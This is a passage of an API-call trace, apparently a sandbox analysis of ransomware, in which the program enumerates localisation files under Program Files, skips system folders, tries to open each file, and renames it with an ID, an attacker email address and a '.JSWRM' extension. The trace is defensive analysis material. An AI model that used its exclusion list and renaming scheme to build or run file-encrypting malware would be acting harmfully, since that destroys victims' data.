out: lpWideCharStr=0x0) returned 8 [0069.201] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a3d8 [0069.201] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a3d8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0069.201] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a3d8 | out: hHeap=0x1e0000) returned 1 [0069.201] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x1f10b0 [0069.201] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd6) returned 0x1fc808 [0069.201] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f10b0 | out: hHeap=0x1e0000) returned 1 [0069.201] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x140) returned 0x1ff448 [0069.201] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0069.201] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f84e8 | out: hHeap=0x1e0000) returned 1 [0069.201] MoveFileW (lpExistingFileName="C:\\Program Files\\Common Files\\System\\msadc\\en-US\\msadcer.dll.mui" (normalized: "c:\\program files\\common files\\system\\msadc\\en-us\\msadcer.dll.mui"), lpNewFileName="C:\\Program Files\\Common Files\\System\\msadc\\en-US\\msadcer.dll.mui.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\common files\\system\\msadc\\en-us\\msadcer.dll.mui.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 0 [0069.201] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1ff448 | out: hHeap=0x1e0000) returned 1 [0069.201] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21f6d8 | out: hHeap=0x1e0000) returned 1 [0069.201] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23b400 | out: hHeap=0x1e0000) returned 1 [0069.201] FindNextFileW (in: hFindFile=0x232000, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3b9e0d51, ftCreationTime.dwHighDateTime=0x1d2a058, ftLastAccessTime.dwLowDateTime=0x7449544e, ftLastAccessTime.dwHighDateTime=0x1d2a058, ftLastWriteTime.dwLowDateTime=0xb2c9ec00, ftLastWriteTime.dwHighDateTime=0x1d29faa, nFileSizeHigh=0x0, nFileSizeLow=0x1800, dwReserved0=0x0, dwReserved1=0x0, cFileName="msadcor.dll.mui", cAlternateFileName="")) returned 1 [0069.201] lstrcmpiW (lpString1="msadcor.dll.mui", lpString2=".") returned 1 [0069.201] lstrcmpiW (lpString1="msadcor.dll.mui", lpString2="..") returned 1 [0069.202] lstrcmpiW (lpString1="msadcor.dll.mui", lpString2="...") returned 1 [0069.202] lstrcmpiW (lpString1="msadcor.dll.mui", lpString2="windows") returned -1 [0069.202] lstrcmpiW (lpString1="msadcor.dll.mui", lpString2="recovery") returned -1 [0069.202] lstrcmpiW (lpString1="msadcor.dll.mui", lpString2="perflogs") returned -1 [0069.202] lstrcmpiW (lpString1="msadcor.dll.mui", lpString2="documents and settings") returned 1 [0069.202] lstrcmpiW (lpString1="msadcor.dll.mui", lpString2="$RECYCLE.BIN") returned 1 [0069.202] lstrcmpiW (lpString1="msadcor.dll.mui", lpString2="system volume information") returned -1 [0069.202] lstrcmpiW (lpString1="msadcor.dll.mui", lpString2="msocache") returned -1 [0069.202] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2413a8 [0069.202] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="msadcor.dll.mui", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0069.202] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="msadcor.dll.mui", cchWideChar=15, lpMultiByteStr=0x345ebd8, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="msadcor.dll.mui", lpUsedDefaultChar=0x0) returned 15 [0069.202] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2413a8 | out: hHeap=0x1e0000) returned 1 [0069.202] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240ef8 [0069.202] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="msadcor.dll.mui", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0069.202] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="msadcor.dll.mui", cchWideChar=15, lpMultiByteStr=0x345eba8, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="msadcor.dll.mui", lpUsedDefaultChar=0x0) returned 15 [0069.202] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240ef8 | out: hHeap=0x1e0000) returned 1 [0069.202] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x23b400 [0069.202] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2196c0 | out: hHeap=0x1e0000) returned 1 [0069.202] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0069.202] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0069.202] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2196c0 [0069.202] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\System\\msadc\\en-US\\msadcor.dll.mui" (normalized: "c:\\program files\\common files\\system\\msadc\\en-us\\msadcor.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0069.203] GetFileSizeEx (in: hFile=0xffffffff, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=10049536280073920) returned 0 [0069.203] SetFilePointer (in: hFile=0xffffffff, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xffffffff [0069.203] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x27100) returned 0x24e1e0 [0069.203] ReadFile (in: hFile=0xffffffff, lpBuffer=0x24e1e0, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24e1e0, lpNumberOfBytesRead=0x345e89c*=0x0, lpOverlapped=0x0) returned 0 [0069.203] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24e1e0 | out: hHeap=0x1e0000) returned 1 [0069.203] CloseHandle (hObject=0xffffffff) returned 1 [0069.203] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x21f6d8 [0069.203] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0069.203] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f84e8 [0069.203] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x1f84e8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0069.203] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8328 [0069.203] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f84e8 | out: hHeap=0x1e0000) returned 1 [0069.203] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0069.203] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a330 [0069.203] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a330, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0069.203] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a330 | out: hHeap=0x1e0000) returned 1 [0069.203] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x1f10b0 [0069.203] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd6) returned 0x1fc808 [0069.203] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f10b0 | out: hHeap=0x1e0000) returned 1 [0069.203] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x140) returned 0x1ff448 [0069.203] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0069.203] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8328 | out: hHeap=0x1e0000) returned 1 [0069.203] MoveFileW (lpExistingFileName="C:\\Program Files\\Common Files\\System\\msadc\\en-US\\msadcor.dll.mui" (normalized: "c:\\program files\\common files\\system\\msadc\\en-us\\msadcor.dll.mui"), lpNewFileName="C:\\Program Files\\Common Files\\System\\msadc\\en-US\\msadcor.dll.mui.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\common files\\system\\msadc\\en-us\\msadcor.dll.mui.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 0 [0069.204] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1ff448 | out: hHeap=0x1e0000) returned 1 [0069.204] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21f6d8 | out: hHeap=0x1e0000) returned 1 [0069.204] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2196c0 | out: hHeap=0x1e0000) returned 1 [0069.204] FindNextFileW (in: hFindFile=0x232000, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3ba9f918, ftCreationTime.dwHighDateTime=0x1d2a058, ftLastAccessTime.dwLowDateTime=0x7449544e, ftLastAccessTime.dwHighDateTime=0x1d2a058, ftLastWriteTime.dwLowDateTime=0xb198bf00, ftLastWriteTime.dwHighDateTime=0x1d29faa, nFileSizeHigh=0x0, nFileSizeLow=0x3800, dwReserved0=0x0, dwReserved1=0x0, cFileName="msaddsr.dll.mui", cAlternateFileName="")) returned 1 [0069.204] lstrcmpiW (lpString1="msaddsr.dll.mui", lpString2=".") returned 1 [0069.204] lstrcmpiW (lpString1="msaddsr.dll.mui", lpString2="..") returned 1 [0069.204] lstrcmpiW (lpString1="msaddsr.dll.mui", lpString2="...") returned 1 [0069.204] lstrcmpiW (lpString1="msaddsr.dll.mui", lpString2="windows") returned -1 [0069.204] lstrcmpiW (lpString1="msaddsr.dll.mui", lpString2="recovery") returned -1 [0069.204] lstrcmpiW (lpString1="msaddsr.dll.mui", lpString2="perflogs") returned -1 [0069.204] lstrcmpiW (lpString1="msaddsr.dll.mui", lpString2="documents and settings") returned 1 [0069.204] lstrcmpiW (lpString1="msaddsr.dll.mui", lpString2="$RECYCLE.BIN") returned 1 [0069.204] lstrcmpiW (lpString1="msaddsr.dll.mui", lpString2="system volume information") returned -1 [0069.204] lstrcmpiW (lpString1="msaddsr.dll.mui", lpString2="msocache") returned -1 [0069.204] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0069.204] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="msaddsr.dll.mui", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0069.204] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="msaddsr.dll.mui", cchWideChar=15, lpMultiByteStr=0x345ebd8, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="msaddsr.dll.mui", lpUsedDefaultChar=0x0) returned 15 [0069.204] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0069.204] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2413a8 [0069.204] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="msaddsr.dll.mui", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0069.204] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="msaddsr.dll.mui", cchWideChar=15, lpMultiByteStr=0x345eba8, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="msaddsr.dll.mui", lpUsedDefaultChar=0x0) returned 15 [0069.204] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2413a8 | out: hHeap=0x1e0000) returned 1 [0069.204] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2196c0 [0069.204] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23b400 | out: hHeap=0x1e0000) returned 1 [0069.204] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0069.204] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0069.204] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x23b400 [0069.204] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\System\\msadc\\en-US\\msaddsr.dll.mui" (normalized: "c:\\program files\\common files\\system\\msadc\\en-us\\msaddsr.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0069.204] GetFileSizeEx (in: hFile=0xffffffff, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=9454425611678720) returned 0 [0069.204] SetFilePointer (in: hFile=0xffffffff, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xffffffff [0069.205] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x27100) returned 0x24e1e0 [0069.205] ReadFile (in: hFile=0xffffffff, lpBuffer=0x24e1e0, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24e1e0, lpNumberOfBytesRead=0x345e89c*=0x0, lpOverlapped=0x0) returned 0 [0069.205] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24e1e0 | out: hHeap=0x1e0000) returned 1 [0069.205] CloseHandle (hObject=0xffffffff) returned 1 [0069.205] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x21f6d8 [0069.205] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0069.205] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8328 [0069.205] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x1f8328, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0069.205] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f84e8 [0069.205] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8328 | out: hHeap=0x1e0000) returned 1 [0069.205] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0069.205] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a360 [0069.205] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a360, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0069.205] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a360 | out: hHeap=0x1e0000) returned 1 [0069.205] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x1f10b0 [0069.205] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd6) returned 0x1fc808 [0069.205] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f10b0 | out: hHeap=0x1e0000) returned 1 [0069.205] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x140) returned 0x1ff448 [0069.205] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0069.205] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f84e8 | out: hHeap=0x1e0000) returned 1 [0069.205] MoveFileW (lpExistingFileName="C:\\Program Files\\Common Files\\System\\msadc\\en-US\\msaddsr.dll.mui" (normalized: "c:\\program files\\common files\\system\\msadc\\en-us\\msaddsr.dll.mui"), lpNewFileName="C:\\Program Files\\Common Files\\System\\msadc\\en-US\\msaddsr.dll.mui.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\common files\\system\\msadc\\en-us\\msaddsr.dll.mui.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 0 [0069.205] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1ff448 | out: hHeap=0x1e0000) returned 1 [0069.205] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21f6d8 | out: hHeap=0x1e0000) returned 1 [0069.205] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23b400 | out: hHeap=0x1e0000) returned 1 [0069.206] FindNextFileW (in: hFindFile=0x232000, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3ba9f918, ftCreationTime.dwHighDateTime=0x1d2a058, ftLastAccessTime.dwLowDateTime=0x7449544e, ftLastAccessTime.dwHighDateTime=0x1d2a058, ftLastWriteTime.dwLowDateTime=0xb198bf00, ftLastWriteTime.dwHighDateTime=0x1d29faa, nFileSizeHigh=0x0, nFileSizeLow=0x1e00, dwReserved0=0x0, dwReserved1=0x0, cFileName="msdaprsr.dll.mui", cAlternateFileName="")) returned 1 [0069.206] lstrcmpiW (lpString1="msdaprsr.dll.mui", lpString2=".") returned 1 [0069.206] lstrcmpiW (lpString1="msdaprsr.dll.mui", lpString2="..") returned 1 [0069.206] lstrcmpiW (lpString1="msdaprsr.dll.mui", lpString2="...") returned 1 [0069.206] lstrcmpiW (lpString1="msdaprsr.dll.mui", lpString2="windows") returned -1 [0069.206] lstrcmpiW (lpString1="msdaprsr.dll.mui", lpString2="recovery") returned -1 [0069.206] lstrcmpiW (lpString1="msdaprsr.dll.mui", lpString2="perflogs") returned -1 [0069.206] lstrcmpiW (lpString1="msdaprsr.dll.mui", lpString2="documents and settings") returned 1 [0069.206] lstrcmpiW (lpString1="msdaprsr.dll.mui", lpString2="$RECYCLE.BIN") returned 1 [0069.206] lstrcmpiW (lpString1="msdaprsr.dll.mui", lpString2="system volume information") returned -1 [0069.206] lstrcmpiW (lpString1="msdaprsr.dll.mui", lpString2="msocache") returned -1 [0069.206] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f84e8 [0069.206] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="msdaprsr.dll.mui", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0069.206] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f20 [0069.206] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="msdaprsr.dll.mui", cchWideChar=16, lpMultiByteStr=0x240f20, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="msdaprsr.dll.mui", lpUsedDefaultChar=0x0) returned 16 [0069.206] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f84e8 | out: hHeap=0x1e0000) returned 1 [0069.206] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8328 [0069.206] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="msdaprsr.dll.mui", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0069.206] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240fe8 [0069.206] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="msdaprsr.dll.mui", cchWideChar=16, lpMultiByteStr=0x240fe8, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="msdaprsr.dll.mui", lpUsedDefaultChar=0x0) returned 16 [0069.206] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8328 | out: hHeap=0x1e0000) returned 1 [0069.206] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x23b400 [0069.206] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2196c0 | out: hHeap=0x1e0000) returned 1 [0069.206] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0069.206] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0069.206] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2196c0 [0069.207] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\System\\msadc\\en-US\\msdaprsr.dll.mui" (normalized: "c:\\program files\\common files\\system\\msadc\\en-us\\msdaprsr.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0069.207] GetFileSizeEx (in: hFile=0xffffffff, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=10049536280073920) returned 0 [0069.207] SetFilePointer (in: hFile=0xffffffff, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xffffffff [0069.207] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x27100) returned 0x24e1e0 [0069.207] ReadFile (in: hFile=0xffffffff, lpBuffer=0x24e1e0, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24e1e0, lpNumberOfBytesRead=0x345e89c*=0x0, lpOverlapped=0x0) returned 0 [0069.207] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24e1e0 | out: hHeap=0x1e0000) returned 1 [0069.207] CloseHandle (hObject=0xffffffff) returned 1 [0069.207] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x21f6d8 [0069.207] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0069.207] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8328 [0069.207] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x1f8328, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0069.208] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f84e8 [0069.208] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8328 | out: hHeap=0x1e0000) returned 1 [0069.208] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0069.208] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a498 [0069.208] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a498, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0069.208] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a498 | out: hHeap=0x1e0000) returned 1 [0069.208] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x1f10b0 [0069.208] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd6) returned 0x1fc808 [0069.208] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f10b0 | out: hHeap=0x1e0000) returned 1 [0069.208] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x140) returned 0x1ff448 [0069.208] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0069.208] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f84e8 | out: hHeap=0x1e0000) returned 1 [0069.208] MoveFileW (lpExistingFileName="C:\\Program Files\\Common Files\\System\\msadc\\en-US\\msdaprsr.dll.mui" (normalized: "c:\\program files\\common files\\system\\msadc\\en-us\\msdaprsr.dll.mui"), lpNewFileName="C:\\Program Files\\Common Files\\System\\msadc\\en-US\\msdaprsr.dll.mui.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\common files\\system\\msadc\\en-us\\msdaprsr.dll.mui.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 0 [0069.208] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1ff448 | out: hHeap=0x1e0000) returned 1 [0069.208] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21f6d8 | out: hHeap=0x1e0000) returned 1 [0069.208] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2196c0 | out: hHeap=0x1e0000) returned 1 [0069.208] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240fe8 | out: hHeap=0x1e0000) returned 1 [0069.208] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f20 | out: hHeap=0x1e0000) returned 1 [0069.208] FindNextFileW (in: hFindFile=0x232000, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3bb38282, 